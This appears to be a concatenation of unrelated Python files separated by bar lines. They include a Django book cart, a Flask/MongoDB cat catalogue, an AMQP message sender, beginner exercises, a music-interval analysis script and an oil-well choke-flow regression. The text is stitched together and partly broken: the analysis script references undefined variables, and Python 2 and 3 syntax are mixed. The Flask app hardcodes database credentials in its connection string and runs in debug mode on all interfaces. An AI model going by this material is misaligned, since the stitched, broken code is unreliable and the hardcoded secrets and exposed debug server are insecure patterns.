# {"type": "authentication", "moduleId": "test", "moduleSecret": "qwerty"}
# {"type": "setCapabilities", "fingerShortcutData": true}
|
from decimal import Decimal
from django.conf import settings
from books.models import Book
from operator import itemgetter
class Cart(object):
def __init__(self, request):
"""
Initialize the cart.
"""
self.session = request.session
cart = self.session.get(settings.CART_SESSION_ID)
if not cart: # save an empty cart in the session
cart = self.session[settings.CART_SESSION_ID] = {}
self.cart = cart
def add(self, book):
"""
Add a book to the cart.
"""
book_pk = str(book.pk)
if book_pk not in self.cart:
#because seller might change the price of the book,we store the current price.
self.cart[book_pk] = {'price': str(book.price)}
self.save()
def save(self):
self.session.modified=True
def remove(self, book):
"""
Remove a book from the cart.
"""
book_pk = str(book.pk)
if book_pk in self.cart:
del self.cart[book_pk]
self.save()
def __iter__(self):
"""
Iterate over the items in the cart and get the book from the databases.
"""
book_pks = self.cart.keys()
#get the book objects and add them to the cart.
books = Book.objects.filter(pk__in=book_pks)
cart = self.cart.copy()
for book in books:
cart[str(book.pk)]['book'] = book
cart[str(book.pk)]['price'] = book.price
cart[str(book.pk)]['seller'] = book.seller
for item in cart.values():
item['price']=Decimal(item['price'])
yield item
def __len__(self):
"""
Count all items in the cart.
"""
return len(self.cart.values())
def get_total_price(self):
'''
cart_list = []
for k,v in self.cart.items():
cart_list.append(v)
grouper = ['seller']
key=itemgetter(*str(grouper))
cart_list.sort(key=key)
cart_list = [{**dict(zip(grouper, k)), 'price' : sum(Decimal(map(itemgetter('price')),g))} for k,g in groupby(l,key=key)]
print(cart_list)
'''
return sum(Decimal(item['price']) for item in self.cart.values())
def clear(self):
#remove cart from session
del self.session[settings.CART_SESSION_ID]
self.save()
def offer_total_price(self, offer_price):
return offer_price
def __str__(self):
return str(self.__class__) + ": " + str(self.__dict__)
|
#!/usr/bin/env python
# This script will get the highest UID available under 500
import subprocess
uid_list = []
unique_uid = []
cmd = ["dscacheutil", "-q", "user"]
output = subprocess.Popen(cmd, stdout=subprocess.PIPE)\
.stdout.readlines()
for _ in output:
if "uid" in _:
uid_list.append(_.strip().split(' ')[-1])
for _ in uid_list:
if _ not in unique_uid:
unique_uid.append(_)
unique_uid.sort(key=int)
uid = 499
uuid = False
while uuid == False:
if str(uid) in unique_uid:
uuid == False
uid -= 1
elif str(uid) not in unique_uid:
uuid = True
print("\n\tUnique ID: %s\n" % uid)
|
#!/usr/bin/python3
#
# Send a String message from command line to an AMQP queue or topic
#
# Useful for testing messaging applications
#
# To install the dependencies:
#
# Debian / Ubuntu:
# apt install python3-qpid-proton
#
# RPM:
# dnf install qpid-python
#
# See README_AMQP_Apache_Qpid_Proton.txt
#
# Copyright (c) 2022 Software Freedom Institute SA https://softwarefreedom.institute
# Copyright (c) 2022 Daniel Pocock https://danielpocock.com
#
from __future__ import print_function, unicode_literals
import optparse
from proton import Message
from proton.handlers import MessagingHandler
from proton.reactor import Container
import sys
class Send(MessagingHandler):
def __init__(self, url, msg_body, wait_response):
super(Send, self).__init__()
self.url = url
self.msg_body = msg_body
self.msg_ready = True
self.wait_response = wait_response
def on_start(self, event):
self.sender = event.container.create_sender(self.url)
if self.wait_response:
print("creating receiver for request/response operation")
print("request/response requires recent version of qpid-proton client library")
print("request/response is not supported in all AMQP brokers,")
print("This has been tested successfully on Apache qpidd")
self.receiver = event.container.create_receiver(self.sender.connection, None, dynamic=True)
def on_sendable(self, event):
if event.sender.credit and self.msg_ready:
print ("sending : %s" % (self.msg_body,))
#msg = Message(body=self.msg_body, inferred=True)
if self.wait_response:
if self.receiver.remote_source.address:
_reply_to = self.receiver.remote_source.address
else:
print("request/response mode enabled but we don't have a reply-to address")
sys.exit(1)
else:
_reply_to = None
if sys.version < '3':
msg = Message(body=unicode(self.msg_body, "utf-8"), reply_to=_reply_to)
else:
msg = Message(body=self.msg_body, reply_to=_reply_to)
event.sender.send(msg)
self.msg_ready = False
print("sent")
def on_accepted(self, event):
print("message confirmed")
if self.wait_response:
print("waiting for response on %s" % (self.receiver.remote_source.address,))
# FIXME - add a timeout?
else:
event.connection.close()
def on_message(self, event):
print("response: %s" % (event.message.body,))
event.connection.close()
def on_disconnected(self, event):
print("Disconnected")
parser = optparse.OptionParser(usage="usage: %prog [options]",
description="Send messages to the supplied address.")
parser.add_option("-a", "--address", default="localhost:5672/examples",
help="address to which messages are sent (default %default)")
parser.add_option("-m", "--message", default="Hello World",
help="message text")
parser.add_option("-r", "--response", default=False,
help="wait for a response", action="store_true")
opts, args = parser.parse_args()
try:
Container(Send(opts.address, opts.message, opts.response)).run()
except KeyboardInterrupt:
pass
|
from flask import Flask, render_template, request, redirect
from pymongo import MongoClient
from bson import ObjectId
client = MongoClient('mongodb://user:As1234@ds245971.mlab.com:45971/catpedia')
db = client['catpedia']
cat_collection = db['cats']
app = Flask(__name__)
@app.route('/')
def index():
cats = list(cat_collection.find())
return render_template('index.html', cats=cats)
@app.route('/cat')
def details():
id = request.args.get('id', '')
if not id:
return "404"
cat = cat_collection.find_one({"_id": ObjectId(id)})
return render_template('details.html', cat=cat)
@app.route('/add')
def add():
name = request.args.get('name', '')
description = request.args.get('description', '')
image = request.args.get('image', '')
if name and description and image:
cat = {
"name": name,
"description": description,
"image": image
}
cat_collection.insert_one(cat)
return redirect('/cat?id='+str(cat['_id']))
return render_template('add.html')
app.run(debug=True, port=8082, host='0.0.0.0')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-06-10 12:15
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('k8sproject', '0005_auto_20180610_1954'),
]
operations = [
migrations.CreateModel(
name='result',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('result_from_api_name', models.TextField(max_length=10240, verbose_name='\u6240\u6709\u8fd4\u8fd8\u7ed3\u679c')),
],
options={
'verbose_name': '\u8fd4\u8fd8\u7ed3\u679c',
'verbose_name_plural': '\u8fd4\u8fd8\u7ed3\u679c',
},
),
migrations.RenameModel(
old_name='all_result_info',
new_name='namespace',
),
migrations.AlterModelOptions(
name='namespace',
options={'verbose_name': '\u547d\u540d\u7a7a\u95f4', 'verbose_name_plural': '\u547d\u540d\u7a7a\u95f4'},
),
migrations.RemoveField(
model_name='all_api_for_k8s',
name='namespace_type',
),
migrations.RemoveField(
model_name='all_api_for_k8s',
name='result_from_api_name',
),
migrations.AddField(
model_name='result',
name='api',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='k8sproject.namespace'),
),
]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 9 10:23:54 2020
@author: Alex
"""
import numpy as np
import matplotlib.pyplot as plt
from Analysis_Methods import NLL_1
from Univariate import univariate
#Import univariate method and apply it to mininise mass first
#Extract the function minima, the curvature, and the standard deviation estimate
extract = univariate(0.5, 0.6,0.7 ,0.0021, 0.0023, 0.0025, NLL_1, c=1)
#Print the final result for this method
print("theta, del_m = ", extract[0:2])
print("sig_theta, sig_m = ", extract[4:])
|
import random
def play():
user = input ("rock press 'r', paper press'p' scissors press 's'\n")
user = user.lower()
computer = random.choice(["r", "p","s"])
if user == computer:
return "its a tie, you have both choosen{}"
if win(user, computer):
return" you have won, you have choosen{}the computer has choosen {}"
return"you have lost , you have choosen{}the computer has choosen {}"
def win(player, opponent):
if (player == "r" and opponent == "s") or (player =="p" and opponent == "r") or (player == "s" and opponent=="p"):
#return " you have won, you have choosen {} the computer has choosen {}"
return True
return False
if __name__ == "__main__":
print(play())
def multiply(a, b):
a * b
|
# -*- coding: utf-8 -*-
#Operadores Relacionais
x = 2
y = 3
#Igual == usamos o igual para comparar se dois valores são iguais
print(x == y) #x vale 2 e y vale 3, logo o resultado é False (Falso), pois o numero 2 é diferente de 3
#Diferente != usamos o diferente para comparar se dois valores são diferentes
print(x != y) #x vale 2 e y vale 3, logo o resultado é True (Verdadeiro), pois o numero 2 é diferente de 3
#Maior > usamos o maior para verificar se um valor é maior que o outro
print(x > y) #x vale 2 e y vale 3, logo o resultado é False (Falso), pois o numero 2 é menor que 3
#Menor < usamos o menor para verificar se um valor é menor que o outro
print(x < y) #x vale 2 e y vale 3, logo o resultado é True (Verdadeiro), pois o numero 2 é menor que 3
#Maior Igual >= usamos o maior igual para verificar se um valor é maior ou igual ao outro
print(x >= y) #x vale 2 e y vale 3, logo o resultado é False (Falso) pois o numero 2 é menor que 3
#Menor Igual <= usamos o menor igual para verificar se um valor é menor ou igual ao outro
print(x <= y) #x vale 2 e y vale 3, logo o resultado é True (Verdadeiro), pois o numero 2 é menor que 3
""" Faça alguns testes:
Teste os comandos abaixo:
print(1 == 1)
print(3 >= 2)
print(5 <= 6)
print(2 >= 1)
"""
input("Pressione qualquer tecla para continuar")
|
'''program to input a multidigit no. and
1)print sum
2)print the reverse number
3)check whether the given no. is a palindrome '''
n=input("Enter A Multidigit Number:")
i=1
s=0
while n>i:
f=i*10
x=(n%f)
x=x/i
s=s+x
i*=10
print 'Sum Of The Digits Is', s
m=n
r=0
while n!=0:
d=n%10
r=r*10+d
n=n/10
print'The Reverse of the no. is', r
if m==r:
print'It is a palindrome'
else:
print'It is not a palindrome'
|
## Script (Python) "getPastasRaiz"
##bind container=container
##bind context=context
##bind namespace=
##bind script=script
##bind subpath=traverse_subpath
##parameters=
##title=
##
path={ "query": "/automator", 'depth': 1 }
pastas = context.portal_catalog.searchResults(Type=['Folder'], sort_on="getObjPositionInParent", review_state="published", path=path)
return pastas
|
import itertools
import torch
from sklearn.neural_network import MLPRegressor
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# data = [line.strip() for line in open('/Users/ksnmurthy/research-work/data-kern/pitch-plots/data_schweiz.txt', 'r')]
data = [line.strip() for line in
open('/home/radhamanisha/RBP-codebase/data-kern/pitch-plots/data_bach.txt', 'r')]
def jaccard_similarity(x, y):
intersection_cardinality = len(set.intersection(*[set(x), set(y)]))
union_cardinality = len(set.union(*[set(x), set(y)]))
return intersection_cardinality / float(union_cardinality)
def cond_prob(x, y):
ic = len(set.intersection(*[set(x), set(y)]))
uc = len(set(y))
return ic / float(uc)
vocab_size = list(set(data))
char_to_int = dict((c, i) for i, c in enumerate(vocab_size))
ba = [char_to_int[char] for char in data]
# split into subsequences
data_modified = zip(*[iter(ba)] * 6)
# convert into list
data_modified_list = [list(i) for i in data_modified]
inputs, targets = [], []
for i in data_modified_list:
inputs.append(i[:-1])
targets.append(i[-1:])
two_comb = []
# ba = [char_to_int[char] for char in data]
for i in inputs:
two_comb.append(list(itertools.combinations(i, 2)))
# diff = [abs(x-y) for x,y in two_comb]
two_comb_list = [list(i) for i in two_comb]
diff = []
for i in two_comb_list:
diff.append([abs(x - y) for x, y in i])
# diff = [abs(x-y) for x,y in two_comb]
# get binary differences
diff_binary = []
for i in diff:
if i == 0:
diff_binary.append(i)
elif i != 0:
i = 1
diff_binary.append(i)
# model = MLPRegressor()
# model.fit(two_comb_list,diff_binary)
print(diff_binary[:1])
count_zero, count_one = 0, 0
for i in diff_binary:
if i == 0:
count_zero += 1
elif i == 1:
count_one += 1
# try to predict on test data
test_inputs = []
# repplicate target tensor to make it compatible with zip!!!
test1 = [[i] * 5 for i in targets]
# Flat list such that each list of list merges into a single list..
flat_list = list(list(itertools.chain.from_iterable(i)) for i in test1)
for i, j in zip(inputs, flat_list):
test_inputs.append(zip(i, j))
# modify these test inputs-- tuples into lists
# flatten them again
# cc = [item for sublist in test_inputs for item in sublist]
test_inputs_list = [list(c) for c in cc]
diff1 = []
for i in test_inputs:
diff1.append([abs(x - y) for x, y in i])
jack_sim = []
jc_c = []
for i, j in zip(diff, diff1):
jack_sim.append(jaccard_similarity(i, j))
for i, j in zip(diff, diff1):
jc_c.append(cond_prob(i, j))
diff_binary1 = []
for i in test_inputs_list:
if i == 0:
diff_binary1.append(i)
elif i != 0:
i = 1
diff_binary1.append(i)
j = jack_sim[:50]
j = np.array(j).reshape(5, 10)
jc = jc_c[:50]
jc = np.array(jc).reshape(5, 10)
plt.imshow(j, cmap=plt.cm.RdBu);
plt.title('Jaccard Similarity distribution')
plt.xlabel('DR inputs')
plt.ylabel('DR outputs')
plt.colorbar()
plt.show()
plt.imshow(jc, cmap=plt.cm.RdBu);
plt.title('Conditional probability distribution')
plt.xlabel('DR inputs')
plt.ylabel('DR outputs')
plt.colorbar()
plt.show()
for i in diff1:
if (i[4] == 0):
d15 += 1
d = [d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, d14, d15]
for i in d:
i = i * 0.01
h1 = ['DR-I1', 'DR-I2', 'DR-I3', 'DR-I4', 'DR-I5', 'DR-I6', 'DR-I7', 'DR-I8', 'DR-I9', 'DR-I10']
h2 = ['DR-O1', 'DR-O2', 'DR-O3', 'DR-O4', 'DR-O5']
y_pos = np.arange(len(h2))
print(diff_binary1[:1])
plt.title('Occurrence of DR outputs over 8 datasets')
plt.ylabel('Percentage of occurrence')
plt.xlabel('DR outputs')
plt.xticks(y_pos, h2)
plt.bar(y_pos, de[10:15], align='center', alpha=0.5)
# k = model.predict(test_inputs_list)
# coefficients = [coef.shape for coef in model.coefs_]
# print(coefficients)
# bin_diff_chunks = zip(*[iter(diff_binary)]*10)
# bin_out_chunks = zip(*[iter(k)]*5)
# final_chunks_dict = dict(zip(bin_diff_chunks,bin_out_chunks))
# keys = final_chunks_dict.keys()
# values=final_chunks_dict.values()
# get combinations of key,value
print(len(diff_binary))
print(len(diff_binary1))
drd = list(itertools.product(diff_binary[:5], diff_binary1[:5]))
# print(len(drd))
drd_arr = np.array(drd).reshape(5, 10)
# print(drd_arr)
plt.imshow(drd_arr, cmap=plt.cm.RdBu)
h1 = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10']
# plt.xticks(np.arange(0,9),h1)
# plt.yticks(np.arange(0,4))
plt.colorbar()
plt.show()
# flatten list of lists into one
# flat_list = [item for sublist in drd for item in sublist]
# split flatlist into two lists using zip and map
# w1, w2 = map(list,zip(*flat_list))
# create third column w3 which is for dataset
# w3 = ['Chinese']*len(w1)
# convert into panda frame
# pdd = pd.DataFrame({'DR-input':w1, 'DR-output':w2, 'dataset':w3})
# sns.factorplot(x="DR-input",y="DR-output",col="dataset", data=pdd,kind="strip", jitter=True)
|
from random import randrange
# method 1 O(n**2)
def twoNearestNum1(seq):
dd = float("Inf")
for i in seq:
for j in seq:
if i == j:
continue
d = abs(i - j)
if d < dd:
ii, jj, dd = i, j, d
return ii, jj, dd
# method 2 O(n*log(n))
def twoNearestNum2(seq):
dd = float("Inf")
seq.sort()
for i in range(len(seq) - 1):
x, y = seq[i], seq[i + 1]
if x == y:
continue
d = abs(x - y)
if d < dd:
xx, yy, dd = x, y, d
return xx, yy, dd
def main():
seq = [randrange(10 ** 10) for i in range(100)]
xx, yy, dd = twoNearestNum1(seq)
print(xx, yy, dd)
xx, yy, dd = twoNearestNum2(seq)
print(xx, yy, dd)
if __name__ == "__main__":
main()
|
import asyncio
from asyncio.exceptions import CancelledError
async def producer(q):
for i in range(10):
await q.put(i)
await asyncio.sleep(0.1)
async def watcher(q, name):
while True:
task = await q.get()
print(f"{name} got {task}")
await asyncio.sleep(1)
q.task_done()
async def main():
q = asyncio.Queue()
p = asyncio.create_task(producer(q))
watchers = asyncio.gather(*[watcher(q, f"{i}") for i in range(3)])
await p
print("waiting for watchers to finish")
await q.join()
watchers.cancel()
try:
await watchers
except CancelledError:
print("watchers finished")
asyncio.run(main())
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from typing import Iterable, Mapping
from pants.core.goals.test import TestResult
from pants.engine.internals.native_engine import Address
from pants.jvm.test.junit import JunitTestFieldSet, JunitTestRequest
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, RuleRunner
def run_junit_test(
rule_runner: RuleRunner,
target_name: str,
relative_file_path: str,
*,
extra_args: Iterable[str] | None = None,
env: Mapping[str, str] | None = None,
) -> TestResult:
args = [
"--junit-args=['--disable-ansi-colors','--details=flat','--details-theme=ascii']",
*(extra_args or ()),
]
rule_runner.set_options(args, env=env, env_inherit=PYTHON_BOOTSTRAP_ENV)
tgt = rule_runner.get_target(
Address(spec_path="", target_name=target_name, relative_file_path=relative_file_path)
)
return rule_runner.request(
TestResult, [JunitTestRequest.Batch("", (JunitTestFieldSet.create(tgt),), None)]
)
|
import os
os.chdir(os.path.dirname(__file__))
print(str(os.getcwd()))
os.system('cmd /k "python automation.py"')
|
#!/usr/bin/env python
# coding=utf-8
import numpy as np
def calc_entropy(x):
"""
calculate shanno ent of x
"""
x_value_list = set([x[i] for i in range(x.shape[0])])
ent = 0.0
for x_value in x_value_list:
p = float(x[x == x_value].shape[0]) / x.shape[0]
logp = np.log2(p)
ent -= p * logp
return ent
def calc_attrs_entropy(label_attrs):
attrs = np.array(list(label_attrs.values()))
attrs_entropy = []
for i in range(attrs.shape[1]):
entropy = calc_entropy(attrs[:, i])
if entropy > 0:
entropy = 1.0
else:
entropy = 0
attrs_entropy.append(entropy)
#print(attrs_entropy)
return attrs_entropy
def remove_low_entropy_attrs(label_attrs, entropy_thr=0.0):
label_attrs_removed = {}
valid_attr_idxes = []
attrs = np.array(list(label_attrs.values()))
print(attrs.shape[1])
for i in range(attrs.shape[1]):
entropy = calc_entropy(attrs[:, i])
print(i, entropy)
if entropy > entropy_thr:
valid_attr_idxes.append(i)
for label, attrs in label_attrs.items():
label_attrs_removed[label] = list(np.array(attrs)[valid_attr_idxes])
return label_attrs_removed, valid_attr_idxes
def remove_non_visible_attrs(label_attrs, superclass):
with open('attr_valid_idxes_%s.txt' % (superclass.lower()), 'r') as reader:
label_attrs_removed = {}
valid_attr_idxes = [int(row.strip()) - 1 for row in reader.readlines()]
for label, attrs in label_attrs.items():
label_attrs_removed[label] = list(np.array(attrs)[valid_attr_idxes])
return label_attrs_removed, valid_attr_idxes
def attrs_reduce(class_attrs_path, superclass, entropy_thr = 0):
fattrs = open(class_attrs_path, 'r', encoding='utf-8')
attrs = fattrs.readlines()
fattrs.close()
label_attrs = {}
for row in attrs:
pair = row.strip().split(',')
label_attrs[pair[0]] = list(map(lambda x: float(x), pair[1].strip().split(' ')[1:-1]))
#label_attrs, label_attrs_idxes = remove_non_visible_attrs(label_attrs, superclass)
#label_attrs, label_attrs_idxes = remove_low_entropy_attrs(label_attrs, entropy_thr)
return label_attrs
|
from brain_games.games import progression
from brain_games import engine
def main():
engine.run(game=progression)
|
import socket
import sys
# Create a UDP socket
messages = ["HELP", "LOGIN MTECH GITRDONE", "STATUS", "START", "STOP", "LOGOUT"]
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (sys.argv[1], 4547)
commands = []
commands.append(sys.argv[2])
if len(sys.argv) > 3:
commands.append(sys.argv[3])
for command in commands:
if command in messages:
sent = sock.sendto(command, server_address)
data, server = sock.recvfrom(4096)
print data
|
import time
import json
import paho.mqtt.client as mqtt
def pluie(client, boule,dt):
cmds=[]
cmds1=[]
rings = [2,1,0]
for i in rings :
cmd = {
'command': 'set_ring',
'ring': i,
'rgb': [0, 0, 255]
}
cmd1 = {
'command': 'set_ring',
'ring': (i+1)%3,
'rgb': [0, 0, 0]
}
cmds.append(cmd)
cmds1.append(cmd1)
t=time.time()
i=0
while t + dt > time.time():
client.publish("laumio/{}/json".format(boule), json.dumps(cmds[i]))
client.publish("laumio/{}/json".format(boule), json.dumps(cmds1[i]))
i=(i+1)%3
time.sleep(0.5)
client = mqtt.Client()
client.connect("mpd.lan")
pluie(client, "Laumio_D454DB", 20)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '.\InputKey.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_DialogInputKeyWindow(object):
def setupUi(self, DialogInputKeyWindow):
DialogInputKeyWindow.setObjectName("DialogInputKeyWindow")
DialogInputKeyWindow.resize(303, 129)
self.gridLayout = QtWidgets.QGridLayout(DialogInputKeyWindow)
self.gridLayout.setObjectName("gridLayout")
self.label_2 = QtWidgets.QLabel(DialogInputKeyWindow)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 2, 0, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(DialogInputKeyWindow)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setCenterButtons(True)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 4, 0, 1, 1)
self.label = QtWidgets.QLabel(DialogInputKeyWindow)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.lineEditKey = QtWidgets.QLineEdit(DialogInputKeyWindow)
self.lineEditKey.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEditKey.setObjectName("lineEditKey")
self.gridLayout.addWidget(self.lineEditKey, 1, 0, 1, 1)
self.lineEditOTP = QtWidgets.QLineEdit(DialogInputKeyWindow)
self.lineEditOTP.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEditOTP.setObjectName("lineEditOTP")
self.gridLayout.addWidget(self.lineEditOTP, 3, 0, 1, 1)
self.retranslateUi(DialogInputKeyWindow)
self.buttonBox.accepted.connect(DialogInputKeyWindow.accept)
self.buttonBox.rejected.connect(DialogInputKeyWindow.reject)
QtCore.QMetaObject.connectSlotsByName(DialogInputKeyWindow)
def retranslateUi(self, DialogInputKeyWindow):
_translate = QtCore.QCoreApplication.translate
DialogInputKeyWindow.setWindowTitle(_translate("DialogInputKeyWindow", "Input Key"))
self.label_2.setText(_translate("DialogInputKeyWindow", "OTP를 입력하세요."))
self.label.setText(_translate("DialogInputKeyWindow", "복호화 키를 입력하세요."))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
DialogInputKeyWindow = QtWidgets.QDialog()
ui = Ui_DialogInputKeyWindow()
ui.setupUi(DialogInputKeyWindow)
DialogInputKeyWindow.show()
sys.exit(app.exec_())
|
n1 = int(input('Digite a Nota 1: '))
n2 = int(input('Digite a Nota 2: '))
mediaNotas = (n1+n2)/2
print('A NF foi: {}!'.format(mediaNotas))
if mediaNotas < 5.0:
print('REPROVADO!')
elif mediaNotas >= 5.0 and mediaNotas < 6.9:
print('RECUPERAÇÃO')
else:
print('APROVADO!')
|
#-*- coding: utf-8 -*-
"""
forms/activity.py
~~~~~~~~~~~~~~~~~~
定义活动相关的表单
"""
from flask.ext import wtf
from scriptfan.forms import RedirectForm
class ActivityForm(RedirectForm):
title = wtf.TextField(u'活动标题', validators=[ \
wtf.Required(message=u'请为活动填写一个标题')])
content = wtf.TextAreaField(u'活动简介', validators=[ \
wtf.Length(min=10, max=5000, message=u'简介至少10个字')])
start_time = wtf.TextField(u'开始时间', validators=[ \
wtf.Required(message=u'需要指定开始时间')])
end_time = wtf.TextField(u'结束时间', validators=[ \
wtf.Required(message=u'需要指定结束时间')])
address = wtf.TextField(u'活动地点')
latitude = wtf.HiddenField()
longitude = wtf.HiddenField()
|
# Code for CS229 Final
import numpy as np
import sklearn as skl
import skimage as ski
import pandas as pd
import matplotlib.pyplot as plt
import xlrd
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
from sklearn import linear_model
from sklearn import preprocessing
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import Pipeline
from sklearn.linear_model import Ridge
from sklearn.neural_network import MLPRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error
from sklearn.datasets import make_friedman1
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.feature_selection import SelectFromModel
from sklearn.datasets import make_regression
# Seed the randomness of the simulation so this outputs the same thing each time
np.random.seed(0)
# Reading the data
# You need to put the location of the data on your computer between ''
Data = pd.read_excel ('RawData.xlsx', sheet_name='All_OL')
df = pd.DataFrame(Data, columns = ['Group', 'Gross', 'Oil', 'Water', 'waterCut', 'GOR', 'GLR',
'FWHP', 'Press', 'Temp', 'chokeSize', 'CHK_US', 'CHK_DS'])
df2 = pd.DataFrame(Data, columns = ['Gross', 'GLR', 'FWHP', 'Temp', 'chokeSize', 'GOR'])
# Reading and Defining Features
Gross = df[['Gross']]
GLR = df[['GLR']]
FWHP = df[['FWHP']]
Temp = df[['Temp']]
chokeSize = df[['chokeSize']]
PDS = df[['CHK_DS']]
WC = df[['waterCut']]
WC = 100 - WC.to_numpy()
df_arr = df.to_numpy()
DP = df_arr[ : ,7] - df_arr[ : ,12]
Pratio = df_arr[ : ,12]/df_arr[ : ,7]
Crit = Pratio <= 0.5
SubCrit = Pratio > 0.5
df_arr2 = df_arr[Crit,:]
Gross = Gross[ : ]
GLR = GLR[ : ]
FWHP = FWHP[ : ]
Temp = Temp[ : ]
chokeSize = chokeSize[ : ]
PTSGLR = FWHP.to_numpy()*Temp.to_numpy()*chokeSize.to_numpy()/GLR.to_numpy()
Gillbert = 0.1*FWHP.to_numpy()*np.power(chokeSize.to_numpy(), 1.89)/np.power(GLR.to_numpy(), 0.546)
Slog = np.log(chokeSize)
GLRwc = GLR.to_numpy()*WC
DPPratio = DP/df_arr[ : ,7]
TPratio = df_arr[ : ,9]/df_arr[ : ,7]
Slog_inv = 1.0/Slog
# Gross/Pressure
array1 = np.array(df_arr[ : ,7] - df_arr[ : ,12])
DP = np.where(array1==0, 1, array1)
GrossP = df_arr[:,1]/(df_arr[:,7])
df2[['Gross']] = GrossP
# Plotting Gross flowrate vs. different features
fig = plt.figure()
fig.set_size_inches(20.5, 3.5, forward=True)
plt.subplot(1, 5, 1)
plt.plot(GLR, Gross, 'o', color='blue')
plt.xlabel('GLR (SCF/STB)')
plt.ylabel('Gross (bbl/Day)')
plt.title('Gross vs. GLR')
plt.subplot(1, 5, 2)
plt.plot(FWHP, Gross, 'o', color='red')
plt.xlabel('FWHP (psi)')
plt.title('Gross vs. FWHP')
plt.subplot(1, 5, 3)
plt.plot(Temp, Gross, 'o', color='yellow')
plt.xlabel('Temperature (F)')
plt.title('Gross vs. Temperature')
plt.subplot(1, 5, 4)
plt.plot(chokeSize, Gross, 'o', color='green')
plt.xlabel('Choke Size')
plt.title('Gross vs. Choke Size')
plt.subplot(1, 5, 5)
plt.plot(DP, Gross, 'o', color='purple')
plt.xlabel('DP(psi)')
plt.title('Gross vs. DP')
plt.savefig('All in one_All Data.png')
plt.close()
# Adding all possible features and pd to np and random permutation
df2_arr = df2.to_numpy()
df2_arr = np.append(df2_arr, np.reshape(DP, (DP.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(WC, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(PTSGLR, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(Gillbert, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(Slog, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(GLRwc, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(DPPratio, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(TPratio, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(Slog_inv, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(Crit+1, (WC.shape[0],1)), axis=1)
# Fields Info
#Field A: 0,1488
#Field B: 1489,3058
#Field C: 3059:
BeginIdx = 0
EndIdx = -1
df2_arr = df2_arr[BeginIdx:EndIdx,:]
# For calling fields A and C
#df2_arr = df2_arr[np.r_[0:1488,3059:-1],:]
df2_arr = df2_arr.astype(int)
for i in range(df2_arr.shape[0]):
for j in range(df2_arr.shape[1]):
if df2_arr[i,j] == 0:
df2_arr[i,j] = 1
df2_arr = df2_arr[:]
df2_arr = df2_arr[np.random.permutation(df2_arr.shape[0]), :]
# Calculating Mean and std
df2_mean = np.mean(df2_arr, axis = 0)
df2_std = np.std(df2_arr, axis = 0)
# Excluding outliers (out of 3sigma)
df2_filt_3s = [x for x in df2_arr if (x[0] > df2_mean[0] - 3 * df2_std[0])]
df2_filt_3s = [x for x in df2_filt_3s if (x[0] < df2_mean[0] + 3 * df2_std[0])]
for i in range(5):
df2_filt_3s = [x for x in df2_filt_3s if (x[i+1] > df2_mean[i+1] - 3 * df2_std[i+1])]
df2_filt_3s = [x for x in df2_filt_3s if (x[i+1] < df2_mean[i+1] + 3 * df2_std[i+1])]
ymax = 10000
df2_filt_3s = [x for x in df2_filt_3s if (x[0]*x[2] < ymax)]
df2_filt_3s = np.array(df2_filt_3s)
df2_filt = df2_filt_3s
n = df2_filt.shape[0]
m = int(n * 0.8)
Idx = [1,3,4,5,6,7,12,15]
train_y = df2_filt[:m,0]
train_x = df2_filt[:m,Idx]
test_y = df2_filt[m:,0]
test_x = df2_filt[m:,Idx]
# Gilbert
Gillbert_train = df2_filt[:m,9]
Gillbert_test = df2_filt[m:,9]
# Plotting measured vs. Predicted Gross flowrate
plt.figure()
plt.scatter(test_y*df2_filt[m:,2], Gillbert_test, color='blue', linewidth=1)
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
